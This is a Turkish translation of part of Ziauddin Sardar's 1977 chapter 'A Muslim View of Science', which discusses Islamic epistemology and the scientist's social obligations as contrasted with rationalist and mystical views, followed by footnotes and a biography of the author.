İslam çerçevesi içinde, herhangi bir konuda çalışmanın gayesi toplum için sosyal uygunluk taşımasıdır. “Bilim için bilim” diye bir düşünme biçimi yoktur. Bilimin çıkar için yapılması da reddedilmiştir. Bilimsel çalışmanın meşruluk ve haklılığı, insanın hem dünya hem ahiret hem de bunları kuşatan her şey hakkında niyet ve hedef taşımasını emreden Kur’an’da bulunmaktadır. Eğer “Allah alîm-i mutlaktır” diye inanıyorsanız, cehaleti haklı çıkaracak herhangi bir mazeretiniz bulunmamaktadır.

İşte bu çerçevede, İslam saf bilginin önemini vurgulamakta ve insanın olgunlaşması için ilme gayret etmesini teşvik etmektedir. (33) İnsan için olgunluğa erişmeyi sağlayan ve ruhu süsleyen bilgiden yarayışlı başka ne vardır ki? Buna rağmen, bilgi edinmenin zevki sosyal fonksiyonları ifade etme ve ihtiyaçları karşılama özellikleriyle bir araya getirilmelidir. Bilgilenme, kendisinde başlayıp biten zevk alma durumundan tamamen uzak olması şartıyla, yüce gayelere erişmenin aracı olmalıdır. Ana kaynağı ister Vahiy isterse bilimsel araştırma olsun bütün ilimler, esas gayesinden uzaklaştığında “sorumlu ve suçlu” tutulabilmelidir.

Herhangi bir bilim nasıl suçlanabilecektir? “Kötülüğe yol gösterdiği” zaman; istenmeyen sosyal etki ve sonuçlar meydana getirdiği zaman; insanı insandan ve dünyasından uzaklaştırıp yabancılaştıracak bir derecede soyutlamaya vesile olduğu zaman; aydınlanmaya değil de kargaşaya sürüklediği zaman… İslam bilgi teorisi; duyumsal algılama, sezgi, deney, tümdengelim ve tümevarım tekniklerine sahip olmayı istediği kadar “İnsanın İçsel Deneyini” de devşiren bir yöntemi zorunlu kılar. Bütün ve tam bir varlık olarak insanın tecrübesi, sadece fiziksel ve duyusal dürtülerden ibaret değildir; akli sezgiyi ve ruhi süreci de kuşatmaktadır. İçsel tecrübeyi bedensel olandan ayırmak, insanı robotlaşmaya ve yabancılaşmaya, son olarak da kendini tahribe sürükler. Tam bir insan için bütün tecrübeler gerçektir; yerçekimi kadar, araştırma ve değerlendirmenin önemi kadar. Onlardan herhangi birini dışlamak gerçeği dışlamaktan farksızdır. İslam, kendi bağlılarını bir bütün olarak gerçeğe ve ona yakınlaşmaya sevk eder. Bu tasdikin tam bir ifadesi İslam kelimesinin dışında bıraktığı (nefy) ve kabul ettiği (ikrar) ortaya koyar: (La İlahe İllallah) O’nun gerçekliğinden başka grçeklik yoktur; bütün diğer “gerçeklikler” Büyük Hakikate zorunlu olarak bağıntılıdır. Cisimli veya cisimsiz, şekilli veya şekilsiz, ince ve kaba bütün evrensel gerçeklikler Asli Hakikatin yaratış süreci veya kendini açıkça göstermesiyle sınırlandırılan bildirimlerinden başka bir şey değildir. Hakikatin tam bir görüntüsünü elde etmek için, akli idrak Kur’an’ın “fu’âd veya kalb” diye tanımladığı, veya içgözü (basiret) diye tarif edebileceğimiz hassa tarafından eksikliği giderilmelidir. “Can gözü” Mevlana Celaleddin Rumi’nin güzel kelimeleriyle “akli idrak ve tahlilci muhakemenin açıklığından çok daha başka bir biçimde, güneş ışınlarından beslenen ve Hakikatin türlü çehreleriyle bağlantımızı sağlayan” diye bahsettiği iç sezgi ve kesin anlayıştır. Gerçekte bu “gören”, yani doğru olarak yorumlayıp “bildiren” şey asla yanılmaz. Bu demek değildir ki Can Gözü esrarlı özel bir meleke veya kabiliyettir; daha çok kelimenin psikolojik algısının herhangi bir rol oynamadığı, sezgiyle ilham içinde Asli Hakikatle ilişki kurma tarzıdır. Daha da fazlası, tecrübenin yaygın görünüşünün böylece bize açımlandığı fiziksel tecrübe kadar somut ve gerçek bir şeydir. Bunu “tinsel”, “mistik” be hatta “doğaüstü” olarak tanımlamak tecrübe yönüyle kıymetini düşürmek anlamına gelir.

Batılı bilim adamı doğayı ölçülebilir katı değerler şeklinde değerlendirecek bir surette yetiştirilmiştir. Onun bilgilenmesi, denetime tabi fiziksel deney yoluyla doğrulanabilir bir hale gelmek zorundadır; ayrıca kendi doğasına mahsus ve uygun bir halde olan bir takım kural, kanun ve örnekler üzerine kurulmuş olmalıdır. Bununla beraber eğer bilimsel emirler, akademik inceleme ve araştırmanın geçerli ve bir alanı olan “metafiziği” azlederse bilim adamı gerçekte insan bilgisinin (değeri ve doğruluğu konusunda ciddi tartışmalar yapmaya değmez) sezgisinin geniş ve büyük vücudunu lekelemiş olacaktır. Modern Batı bilimi tarafından sunulan alternatif ise yalnızlaştırma, soyutlaştırma ve yabancılaştırmadan başka bir şey değildir. Buradaki nazik soru şudur: Yeni-Apolloncular ve Yeni-Diyonizosçularla karşılaştırılma durumunda Müslüman bilginlerin sosyal sorumluluk ve yükümlülükleri hangi pozisyonda olacaktır.

Bilim Adamının Sosyal Yükümlülükleri

Bilim adamının üç sorumluluğu ve yükümlülüğü vardır. (1) Kendisine, hayatında en mükemmeli yapma zorunluluğuna, (2) Topluma ve çevreye, (3) Bir bilim adamının doğal olarak değerli ve önemli şeylere karşı kendisini tanımlayan, belirleyen ve sınırlayan içsel duygu ve durumlara.

Akılcı ve Yeni-Apolloncu bakış açısından kişinin kendisine karşı olan yükümlülüğü, basitçe bir kimsenin kariyerinde başarı kazanmaya çalışması demektir. İkinci sorumluluğu bahsinde, akılcı toplum ve çevrenin kendi genel görüşlerine uydurulması doğrultusunda değişmesinde ısrar eder. Harici tesir ve kuvvetler, buna göre, kendilerini bilime adapte etmek zorundadırlar ki “nesnellik ve ilerleme” gerçekleşebilsin. Üçüncü sorumluluk çoğunlukla kendisinin ötesindedir. Eğer buna tamamen uyulursa bilim adamının herhangi bir seçim yapmaksızın hükmü altında bulunmak zorunda olduğu kanun ve kuraldan kayıtsızlığını üstlenmiş olarak itibar görmesi demek olur. Dini emir, yasak, öğüt ve uyarılarda bile, kendi dışındaki belirli bilim adamlarının davranış biçimine tabi olup sadece uyması önerilmektedir

Bilim adamlarının sorumluluklarını genellikle faydacılık tarzından alınan akılcı perspektiflerle beraber düşünülmektedir; bazılarının ‘iyi’si için diğerlerinin gözden çıkarılmasını ister istemez ifade eden en büyük rakama en iyinin ayrılması görüşü öngörülmektedir. Akılcı bilim adamının üç sorumluluğu birbirinden bağımsızdır, fakat beraberce koşmaktadır, hudutsuzluk, kayıtsızlık ve ilgisizliğe doğru.

Tam karşıtı olan ‘mistik bilim adamları’ ise bu üç yükümlülüğü bir bütün olarak toplum ve çevre üzerinde yoğunlaştırarak ve mistik yolların çeşitliliğine (Budizm, İlahi Işıkçılık, Katoliklik vb.) bağlı olma durumuyla öte dünya anlayışını daha çok öne çıkararak birbirine göre ayarlama şeklinde düşünmektedirler. Mistisizm, bir kimsenin kendisini kontrol etme gücünü elde etmesi ve daha çok Tanrı sevgisini kazanmayı, düşünce ve hareketlerinde Tanrı varlığına sadakatle bağlanıp içsel tecrübeyi gerçekleştirmeyi kastetmektedir. Bununla beraber, bir mistik için bu ifadeler sadece tasdikli bir değer taşımaz; o bunları kendine geçek olarak duyumsatıp özümsemeyi ve hazmetmeyi talep etmek zorundadır. Bütün çekici pozisyonuna rağmen, sırrilik, edinimlerini açığa vurmama özelliği taşımaktadır. Batılı ülkelerin çoğunda, son asırlarda, mistisizm; dini ve sosyal hayatta büyük rol oynamaz, güçlü bir vaziyette değildir. Lakin bu potansiyel gizli bir kuvvet olarak halen mevcuttur. İleri teknoloji uygarlığının büyük buhranı sebebiyle mistik olan, heyecan ve şevk veren dinler kaçınılmaz bir biçimde, ama geleneğin disiplininden yoksun olarak, kaba ve yıkıcı bir karakteri kolayca yüklenme özellikleriyle beraber patlama noktasına gelmişlerdir. Bu durumda, Yeni-Diyonizosçuların bilime yaklaşımı, çağdaş bilimsel ahlakın hastalıklarına aşırı ve rotadan çıkmış bir biçimde karşı koymak demek oluyor.

İslam, Yeni-Diyonizosçu ve Yeni-Apolloncu düşünceler arasında tam bir dengeyi takdim etmektedir. Bu en açık bir biçimde zamanın ele alınış tarzında görülüyor. Akılcı felsefede zaman doğrusal ve çizgisel ilerlemeden ibarettir; fert olarak belirli bir bilim adamı için zaman, kendi hayatı ile biten, sınırlanan bir şeydir. Kendi hayatının ötesinde başka bir zaman yoktur, ona kalırsa hiç olmazsa kendi bireysel kimliğinden ibarettir. Mistiklerse yalnız bedensel ölümün sonrasına ait bir hayata inanmanın bu dünyada yaşamayı anlamlandığını savunmaktadırlar. İslam, bu iki görüşün bir nevi sentezini vermektedir: Bu hayat zamana bağlı olarak hayattır; ahiret ise orada uzay, zaman ve nedensellik sınırlarının ötesine geçebildiğimiz ebedi hayattır. Bu hayata, içinde zamanın ve ebediyetin beraberce dokunduğu bir kumaş olarak bakmak zorundayız. Bu anlayış ferdin hayatına bir birlik getirmektedir ve herkesin kazancının feda edilemediği bir potada, toplum ve bilimi aynı derecede eşit bir bütün içinde büyük bir kalıba dökmektedir. Hayatın böyle kavranış tarzı; bilimcilik, fedakârlık ve indiliğin birbirine zıt ve ayrı iddialarını güzelce çözmektedir.

Bilim adamının yükümlülük ve sorumlulukları her iki aleme (dünya ve öte dünyaya) bağlı bir hayatın içinde daha geniş bir kapsam ve bağlamda beraberce düşünüldüğü zaman, kendisine ve çalıştığı dala karşı olan sorumlulukları sadece kendi dünyevi hayatının olaylarına değil, aynı zamanda kendi varlığının görünmeyen kısmına da ait olacaktır. Görecektir ki kendi şahsi refah ve iyiliği ahiretin ebediliğindeki ferdi gelişmesine çok yakın bir biçimde bağlıdır, böylelikle şahsiyetine iç tecrübesinin ışığında bakacaktır. Dış çevredeki bütün değişiklikler, bu anlayışa göre, kendi iç ‘konuşmasını’, kendi içindeki değişiklikleri takip eden bir bağımlılık biçiminde gerçekleşecektir. Topluma yönelik tavır ve hareketleri de aynı eğilimi taşıyacaktır. Yükümlülüklerin üçüncü kategorisine geldiğinde, o bunları kendinden ayrı ve dışardan kendisine zorla kabul ettirilen bir yük olarak değil de, kendi içinde sahip olduğu şeylerle özdeş ve aynı görecektir. Böylelikle bu üç sorumluluk, aynı ahlaki ve manevi ideale doğru birbirine yaklaşan kollar veya elle olabilecektir. (34)

‘Ferdi kurtuluş’ arayışı, bu şekilde, toplumsal kalkınma ve metafizik sürece doğru yönlendirebilecektir. Buna rağmen “hayat ve ebediyet kumaşı”ndan dokunan ahlak ve maneviyat, ne mesela Yeni-Diyonizosçu felsefe tarafından önerildiği biçimde ferdileştirilmek ve ne de kurumsallaştırılmak zorundadır. Sosyalleştirilmek ihtiyacındadır. Ahlaki yasaların sosyalleştirilmesi için ferdi olmayan bir ahlak yapısında, şahsa ait bireysel kurtuluş çabasından sosyal refah ve ahenge doğru yol olan ahlaki hayatın hedeflerinde köklü bir değişim gereklidir.

***

Dipnotlar:

1)       C. P. Snow, The Two Cultures (Scribner, New York, 1971).

2)       J. Bronowski, Science and Human Values (Harper Torch-books, New York, 1965)

3)       “Ne iş programlarının yapılması ve ne de her türlü program için bilimsel öncelik ve üstünlüğün bilim adamları olmayanlara verilmeden, bunların yürütülmesini sağlamak, bilimin karakteristik temeli ve esas stratejisidir. Akıllı, tedbirli ve tecrübeli programlar geniş bilgiye sahip, daha tecrübeli ve konuyu daha öz bir şekilde açık ve belli bir biçimde araştırabilen bilim adamları tarafından iyice incelenip yargılanmak (değerlendirilmek) zorundadır. Bununla birlikte, bu yargıları yapma durumunda olanların milli gaye ve ihtiyaçlara karşı sürekli olarak uyanık ve bilinçli olması en yüksek derecede öneme sahiptir. Aksi takdirde, pratik kullanım ile bilimsel amaç ve buluşların etkili transferini ayrıca engelleyecek olan tehlikeli ve çürümeye yol açabilecek ‘fildişi kule’ olgusu ortaya çıkacaktır.” Sir Frederick Dainton tarafından araştırma sistemlerinin geleceği hakkındaki “A Framework for Government Research and Develeopment” başlıklı rapordan, Conmd.4814 (HSMD, 1971), s.13.

4)       Gerald Holton’dan sonra, “On being Caught Beween Dioysius and Apollonius, 1974, Yaz sayısı.

5)       Steven Wineberg, “Reflection of a Working Scientist”, Daedalus, 1974, Yaz sayısı.

6)       B.M. Oliver, “Towards a New Morality”, IEEE Spectrum 9, 52, (Ocak, 1972).

7)       Harvey Brooks, “Can Science be Redirected?”, Conservatiore National des Arts et Métiers tarafından organize edilen konferanstaki (“Peut-on rediriger la science?”) başlıklı bildiriden, Paris, 4-6 Aralık 1975.

8)       Paul Roubiczck, Ethical Values in the Age of Science (Cambridge Üniv. Yay., Londra, 1969).

9)       Nesnelliğin (objectivity) en geniş kabul gören tasarımları Leibnitz ve Locke’a aittir. Leibnitz’in tasarımının sıralaması, ilk olarak, formal aksiyon sistemlerinin sistematik yargılarını –hipotezler, teoremler- sonuçlandıran kuralların açık ve iyi biçimlendirilmiş kullanılışı; ikinci olarak, muvakkat bilimsel gerçek ve hipetezlerin taklidi ve ispatı için geliştirilen sistemlerin araştırılıp incelenmesi; ve üçüncü olarak, bilimsel deneylerin plan ve projelerinin değerini tayin edilmesi ve yürütülmesi için ortaya konan formal kurallar şeklindedir. Böylece, çeşitli Leibnitz tasarımlarının basitçe nesnellik fikrini taşımadığını söyleyebiliriz. Bununla birlikte, her şeyin ötesinde umumi bir düşünüş tarzı vardır: Belirli bir tasarıma bakılmaksızın üzerinde durulması gereken önemli husus en aza indirgeyen, bilimsel bilginin incelenmesi ve dikkatlice araştırılmasının önemidir. Locke da ayrıca bireysel olmayan, bilimsel nesnelliğin klinik karakterini vurgulamaktadır.

10)    Üzerinde hassasiyetle durulması gereken nokta, eğer bütün gözlem ve           incelemeler teoriyle yüklü olma durumunda ise –teorinin sınamasıyla ilgili gereklikleri yol gösterici prensiplerin ışığında teorinin kendisinin sağlaması zorunluluğunda olduğu gibi- bir fenomenin herhangi bir kuramının açık ve belli gelişimi ve ilerleyişi için bu teorinin sürekli kontrol ve teste tabi tutulması halinde zarara yol açabilecek bir durum meydana getirmesi söz konusudur. Paul Feyerabend, Against Method (New Left Boks, Londra, 1975) adlı kitabında bunu gayet kuvvetli bir şekilde ifade etmektedir.

11)     I. Mitroff, The Subjective Side of Science, A Philosophical Inquiry into the Psychology of the Apollo Moon Scientists (Elsevier, Amstredam, 1974).

12)     Bkz. S. Westfall, “Newton and the Fudge Factor”, Science, 179, 751-8.

13)     H. Ve S. Rose, “The Myth of Neutrality of Science” (editör W. Fuller) The Social Impact of Modern Biology (Routledge ve Kegan Paul, Londra, 1971; ve “The Incorporation of Science”, (editörler H. Ve S. Rose), Teology of/in The Natural Sciences (Macmillian, Londra, 1976).

14)     Elektron hakkında beden bu kadar çok şey biliyoruz? Çünkü elektrik gücü, kütlesel üretim sanayinin başlıca ihtiyacıdır ve çünkü elektronik iletişim modern hükümetlerin dayanağıdır. Elektronun sosyal gerekliliklerinin tam olarak anlaşılması İngiltere’deki genel grev, Almanya’yı güçlendirmek için Hitler’in çıkışı ve Hiroşima sonrasında sistemin nihayet son düşüşüne yol açmasıyla bitmiş, sona ermiştir. Herhangi bir politik makineden bu tür sosyal fonksiyonları görmezlikten gelmesini bekleyebilir miyiz?

15)     J.J. Solomon, çeviri, Science and Politics (Macmillian, Londra, 1973).

16)     J.R. Ravetz, Scientific Knowledge and its Social Problems, Oxford University Pres, Londra, 1971, s.20.

17)     Robert J.Baum, “A Philosophical/Historical Perspective on Contemporary Concerns and Trends in the Area of Science and Values”, Newsletter 9 of the Program of Public Conception of Science, Harward Üniv., Ekim 1974, s.30.

18)     Everett Mendelson, “A Human Reconstruction of Science”, Boston University Journal, Bahar, 1973.

19)     J.R. Ravetz, “What can we Learn from the Freaks?”, CNAM konuşmalarına takdim edilen bir çalışmadan, 4-6 Aralık, 1975, Paris.

20)     Theodore Rozsak, The Making of a Counter Culture (Doubleday, New York, 1969) ve Where the Wasteland Ends (Doubleday, New York, 1972).

21)     Charles Reich, The Greening og America (Random House, New York, 1970).

22)     Theodore Roszak, “Science, Knowledge and Gnosis”, Daedalus, 1974 Yaz.

23)     Ivan Illich, Calebration of Averness (1971); Tools for Convivality (1973); Medical Nemesis (1975); Energy and Equity (1975) hepsi Calder and Boyas tarafından, Londra.

24)     Hossein Nasr, The Encounter of Man and Nature (Allen and Unwin, Londra, 1968).

25)     W.H. Davenort, The One Culture (Pergamon, Londra, 1970).

26)     Paul Goodman, “Can Technology be Humane?”, New York Review of Boks 13, 27-34 (1969 Kasım).

27)    Teilhard de Chardin, The Phenomena of Man (1955); The Future of Man (1959); Man’s Place in Nature (1966) hepsi Fontana tarafından, Londra.

28)     Bkz. Ziauddin Sardar, “The Quest for a New Science”, CNAM konuşmalarına takdim edilen bir çalışmadan, 4-6 Aralık, 1975, Paris; ayrıca Muslim Institute Papers No 1, Open Pres, Slough, 1976.

29)     Mesela Jacques Monod tarafından yazılan Change and Necessitiy’deki gibi, (Fontana, Londra, 1974).

30)     Lynn White, “Historical Roads of our Ecological Crisis”, Science, 155, 1293 (1o Mart 1967).

31)     Hüseyin Nasr’ın mükemmel çalışmalarına bakınız: Science and Civilisation in İslam (Harward University Press, Cambridge, 1968); Introduction to the Islamic Cosmological Doctrines (Harward University Press, Cambridge, 1964); ve Islamic Science (World of the Islam Festival Co., Londra, 1976).

32)     Al-Ghazzali, The Book of Knowledge, çev. Nabih Amin Faris, (Ashraf, Lahore, 1962).

33)     Bir Müslüman alimin hayatında analitik olarak bu çatıyı görebilmek için bkz. Ziauddin Sardar, “Al-Biruni, 973-1048: Encyclopedist, Scientist, Philosopher”, Quest: Journal of the City University, 1974 Yaz, s.28-31.

34)     Daha açık ve detaylı yorum için bkz. Bashire Ahmad Dar, Quranic Ethics (Institute of Islamic Culture, Lahor, 1960).

………….

* Bu tercüme, Ziyaüddin Serdar’ın Science, Technology and Development in the Muslim World (İslam Dünyasında Bilim, Teknoloji ve Gelişme; Londra, 1977) adlı kitabının “A Muslim View of Science (Bilime Müslüman Bakışı; s.21–36)” bölümünün çevirisidir. Haydar Murad Hepsev’in SÖZ (1991, İstanbul, s.55–83) kitabında yayınlanmış; Nisan 2009’da gözden geçirilmiş; Yüce Devlet Dergisi’nde (5, 6, 7, 8. sayılar; 2010–2011) tefrika edilmiştir.

Ziyaüddin Serdar'ın resmi

** Ziyaüddin Serdar (31 Ekim 1951, Pakistan) İslam’ın geleceği, bilim ve kültürel ilişkiler konusunda uzmanlaşmış Londra kökenli bir bilim adamı, yazar ve kültür eleştirmeni. Prospect dergisi onu Britanya’nın ilk 100 entelektüeli arasında zikretmişti ve The Independent gazetesi onu Britanya’nın has Müslüman entelektüeli olarak adlandırıyor.

Ziyaüddin Serdar, 30 yılda çoğu Merryl Wyn Davies’le beraber 45 kitap yazdı/edite etti. Anılarının birinci cildi Çaresizce Cenneti Arama: Kuşkucu Bir Müslümanın Yolculukları (Desperately Seeking Paradise: Journeys of a Sceptical Muslim, Granta, 2006) kitabında toplanmıştır. Son televizyon programı, 2006 yılında BBC için hazırlanan İslam İçin Savaş (Battle for Islam) ismini taşıyan 90 dakikalık bir belgeseldir. Serdar’ın Kur’an üzerine yazdığı bir blog 2008’de The Guardian tarafından yayınlanmıştır.

Serdar, Londra’da City Üniversitesi’nde Siyaset Bilimi ve Yönetim Bölümünde Post-Kolonyal Çalışmalar hakkında misafir öğretim görevlisi olarak ders vermektedir ve strateji dergisi Futures’da editörlük yapmaktadır. Aynı zamanda Birleşik Krallık Eşitlik ve İnsan Hakları Komisyonu’nun üyesidir. Makaleleri genellikle The Guardian ve The Observer gazeteleri ile haftalık dergi New Statesman’da yayınlanmaktadır. 1980’lerde Müslüman ülkelerin fikir hayatı ve politikaları hakkında yayınlanan Inquiry dergisinin kurucuları arasında yer almıştır. Kariyerinin ilk yıllarında Nature ve New Scientist dergileri ile London Weekend Televizyonu için muhabirlik yapmıştır.

Eserleri şunlardır: Kalıbı Kırmak: İslam, Hindistan, Terör ve Can Sıkıcı Şeyler Üzerine Deneme, Makale ve Köşe Yazıları (Breaking the Mould: Essays, Articles and Columns on Islam, India, Terror and Other Things That Annoy Me, ImprintOne, Delhi, 2008); Balti Britain: İngiliz Asya Tecrübesine Bir Bakış (Balti Britain: a Journey Through the British Asian Experience (Granta, 2008)); Müslümanlar Neye İnanıyor?(What Do Muslims Believe? Granta, London, 2006. ); Çaresizce Cenneti Arama: Kuşkucu Bir Müslümanın Yolculukları (Desperately Seeking Paradise: Journeys of a Sceptical Muslim Granta, London, 2005); İslam, Postmodernizm ve Diğer Mevzular: Bir Ziyaüddin Serdar Seçkisi (Islam, Postmodernism and Other Futures: a Ziauddin Sardar reader, Pluto Press, London 2004 (introduced and edited by Sohail Inayatullah and Gail Boxwell).); A’dan Z’ye Postmodern Hayat: 2000’li yıllarda Global Kültür üzerine Denemeler (The A to Z of Postmodern Life: Essays on Global Culture in the Noughties, Vision, 2002); Yabancılar Biziz: Bilim Kurguda Öteki (Aliens R Us: The Other in Science Fiction Cinema, Pluto Press, London, 2002 (Edited with Sean Cubitt)); Sanat, Kültür ve Teori üzerine Third Text Seçkisi (The Third Text Reader on Art, Culture & Theory, Continuum, London, 2002 (Edited with Rasheed Araeen and Sean Cubitt)); Koala Lumpur’un Tüketilmesi (The Consumption of Kuala Lumpur, Reaktion Books, London, 2000.); Thomas Kuhn Ve Bilim Savaşları (Thomas Kuhn and the Science Wars, Icon Books, Cambridge, 2000); Oryantalizm (Orientalism (Concepts in the Social Sciences Series), Open University Press, 1999); Postmodernizm ve Öteki: Batı Kültürünün Yeni Emperyalizmi (Postmodernism and the Other: New Imperialism of Western Culture, Pluto Press, London, 1997); İslami Bilimde Düşünceler (Explorations in Islamic Science, Mansell, London, 1989; Centre for the Studies on Science, Aligarh, 1996); Batıda Müslüman Azınlıklar (Muslim Minorities in The West, Grey Seal, London, 1995 (edited with S. Z. Abedin)); Hilal Doğarken: İslam’da Bilgi ve Çevrenin Geleceği (An Early Crescent: The Future of Knowledge and Environment in Islam, Mansell, London, 1989); Atina’nın İntikamı: Bilim, Sömürü ve 3. Dünya (The Revenge of Athena: Science, Exploitation and the Third World, Mansell, London, 1988); Midas’ın Dokunuşu: İslam’da Bilim, Değerler ve Çevre ( The Touch of Midas: Science, Values and the Environment in Islam and the West, Manchester University Press, Manchester, 1982);

Bilgi ve İslam Dünyası: 21. Yüzyıl İçin Bir Strateji (Information and the Muslim World: A Strategy for the Twenty-first Century, Islamic Futures and Policy Studies, Mansell Publishing Limited, London and New York 1988); İslami Mevzular: Gelecek Fikirlerin Şekli (Islamic Futures: The Shape of Ideas to Come, Mansell, London, 1986) İslam Medeniyetinin Geleceği (The Future of Muslim Civilisation, Mansell, London, 1979); İslam: Bir Sınıflandırmanın Ana Hatları (Islam: Outline of a classification scheme, Clive Bingley, London, 1979); Muhammed: Bir Biyografinin Veçheleri (Muhammad: Aspects of a Biography, Islamic Foundation, Leicester, 1978); İslam Dünyasında Bilim, Teknoloji ve Gelişme (Science, Technology and Development in the Muslim World, Croom Helm, London; Humanities Press, New Jersey; 1977).

Hakkında şu kitap yazılmıştır: Nereden Biliyorsunuz: İslam, Bilim ve Kültürel İlişkiler Hakkında Ziyaüddin Serdar’ı Anlama (How Do You Know: Reading Ziauddin Sardar on Islam, Science and Cultural Relations Pluto Press 2006 (Introduced and edited by Ehsan Masood) )

[Ziyaüddin Serdar hakkındaki bu bölüm, A. Ragıp Akay tarafından wikipedia’dan yararlanılarak hazırlanılmıştır.]

 

Yorumlar 1.730

 1. cheap jordan says:

  My spouse and i got so fortunate when Raymond managed to do his web research via the precious recommendations he had through your web site. It is now and again perplexing to simply be giving out techniques which some others could have been trying to sell. So we realize we have the writer to appreciate because of that. Most of the explanations you made, the straightforward web site navigation, the relationships your site aid to foster – it’s all exceptional, and it is leading our son in addition to our family know that the topic is fun, and that is exceedingly fundamental. Thanks for the whole lot!

 2. My spouse and i got so fortunate that Albert managed to finish up his homework from the ideas he got from your own weblog. It is now and again perplexing just to continually be making a gift of hints which the others could have been making money from. We see we have the website owner to be grateful to for that. All the explanations you’ve made, the simple site menu, the relationships you help foster – it’s got all powerful, and it’s really letting our son and the family imagine that this subject is fun, and that is truly indispensable. Thanks for everything!

 3. I together with my friends appeared to be checking the great secrets found on the website and then all of a sudden I had a horrible suspicion I never expressed respect to the web site owner for those tips. All of the young men happened to be absolutely warmed to learn them and now have surely been having fun with these things. Appreciate your really being quite kind and for deciding upon this form of notable topics millions of individuals are really eager to discover. My very own honest apologies for not expressing appreciation to sooner.

 4. curry shoes says:

  I am only writing to let you understand of the fantastic experience my friend’s girl had studying yuor web blog. She picked up plenty of things, with the inclusion of what it’s like to possess an ideal teaching mindset to make the others with ease grasp a number of very confusing topics. You actually surpassed people’s expectations. I appreciate you for coming up with those productive, trusted, edifying and cool tips about your topic to Tanya.

 5. goyard bag says:

  I must voice my gratitude for your generosity in support of men who actually need help with this one niche. Your very own dedication to getting the message around became extraordinarily significant and have without exception permitted workers much like me to get to their desired goals. Your personal informative recommendations means a whole lot to me and substantially more to my office colleagues. Warm regards; from everyone of us.

 6. yeezy says:

  Thanks a lot for giving everyone a very terrific opportunity to check tips from this website. It is often so beneficial plus jam-packed with a good time for me personally and my office acquaintances to search your site the equivalent of 3 times in 7 days to read through the latest guidance you have got. And definitely, we’re actually contented with your breathtaking ideas you serve. Certain two areas in this article are unquestionably the very best I’ve had.

 7. I precisely wanted to appreciate you yet again. I’m not certain what I might have implemented in the absence of the entire recommendations revealed by you regarding my concern. It absolutely was an absolute fearsome scenario in my position, nevertheless considering your specialised approach you processed it took me to weep over delight. Now i’m grateful for this assistance and then wish you are aware of an amazing job you have been accomplishing teaching others thru your blog. Most likely you haven’t got to know any of us.

 8. I want to show my admiration for your kindness supporting men and women who need help on this subject. Your special dedication to passing the message all-around had become exceptionally interesting and has frequently permitted regular people just like me to realize their ambitions. Your own useful instruction denotes much a person like me and much more to my colleagues. Thank you; from everyone of us.

 9. I wish to express some thanks to this writer just for bailing me out of this particular instance. As a result of researching throughout the internet and meeting tricks which are not powerful, I figured my life was well over. Living without the presence of approaches to the issues you’ve sorted out all through your good short article is a serious case, and ones which might have in a wrong way damaged my career if I hadn’t encountered your web page. Your own mastery and kindness in playing with every item was important. I am not sure what I would have done if I had not encountered such a solution like this. It’s possible to at this point look forward to my future. Thanks so much for your skilled and result oriented help. I will not hesitate to recommend your web sites to anybody who ought to have direction about this subject matter.

 10. yeezy supply says:

  I want to express some thanks to you just for bailing me out of this type of situation. As a result of searching through the world wide web and obtaining opinions which were not helpful, I thought my entire life was well over. Living without the presence of strategies to the issues you have sorted out all through your main site is a serious case, and the ones that could have negatively affected my career if I hadn’t come across the blog. The natural talent and kindness in dealing with the whole thing was vital. I don’t know what I would’ve done if I had not come upon such a solution like this. I’m able to at this moment look ahead to my future. Thanks a lot so much for this high quality and results-oriented help. I won’t think twice to propose the blog to any individual who desires guidelines about this situation.

 11. I precisely desired to thank you very much yet again. I’m not certain what I might have implemented without these tricks revealed by you concerning that concern. It was before the alarming dilemma for me, nevertheless seeing this well-written approach you processed that forced me to weep for fulfillment. I’m just thankful for the advice and even trust you comprehend what a great job you are always providing training people using your website. I am certain you haven’t encountered all of us.

 12. I would like to show some thanks to you just for rescuing me from this particular circumstance. Right after researching throughout the internet and obtaining solutions which are not beneficial, I believed my life was done. Existing without the approaches to the issues you have sorted out by means of your guide is a crucial case, as well as those which could have badly damaged my entire career if I had not discovered the website. Your personal ability and kindness in controlling all the pieces was vital. I’m not sure what I would’ve done if I had not discovered such a step like this. I can also now look forward to my future. Thanks so much for your professional and results-oriented guide. I won’t think twice to endorse your blog to any person who needs care about this matter.

 13. supreme says:

  Thank you so much for giving everyone an extremely pleasant chance to read articles and blog posts from here. It is always very cool and as well , jam-packed with a great time for me and my office co-workers to search your blog the equivalent of three times a week to see the latest secrets you have got. And definitely, I am usually motivated considering the perfect guidelines served by you. Selected 3 areas in this post are clearly the best we have had.

 14. I am only writing to let you understand what a brilliant experience my child undergone studying your site. She realized a wide variety of details, not to mention what it’s like to possess an awesome giving mood to have other people really easily fully understand a variety of very confusing issues. You truly exceeded our expected results. Thank you for rendering these productive, trustworthy, revealing and even easy guidance on the topic to Evelyn.

 15. My wife and i felt so comfortable when Raymond could deal with his preliminary research because of the precious recommendations he had through your blog. It is now and again perplexing just to continually be giving for free tips and hints which usually people might have been trying to sell. Therefore we fully understand we have you to give thanks to because of that. Those illustrations you’ve made, the easy site navigation, the relationships your site aid to promote – it’s got mostly extraordinary, and it’s aiding our son in addition to the family understand this idea is brilliant, which is certainly particularly important. Thank you for the whole thing!

 16. A lot of thanks for your whole work on this web page. My mum really likes doing internet research and it’s easy to see why. My spouse and i notice all regarding the compelling method you deliver priceless secrets by means of the web site and as well improve response from website visitors about this issue then our favorite simple princess is certainly discovering a whole lot. Take pleasure in the rest of the new year. You are conducting a good job.

 17. yeezy says:

  I wish to express my gratitude for your kind-heartedness supporting men and women who actually need help on in this issue. Your real dedication to passing the message all through turned out to be unbelievably informative and has without exception enabled most people like me to arrive at their objectives. The useful instruction implies so much a person like me and further more to my office workers. Regards; from each one of us.

 18. I have to express some thanks to this writer just for rescuing me from this issue. After looking throughout the world-wide-web and finding strategies which were not powerful, I thought my life was gone. Being alive minus the answers to the problems you’ve resolved as a result of your main short article is a crucial case, and the ones that would have adversely damaged my entire career if I hadn’t discovered the website. Your main talents and kindness in maneuvering all the things was crucial. I am not sure what I would’ve done if I had not come across such a point like this. I am able to at this point look ahead to my future. Thank you so much for the high quality and sensible help. I won’t think twice to endorse your blog to anybody who needs to have support about this subject matter.

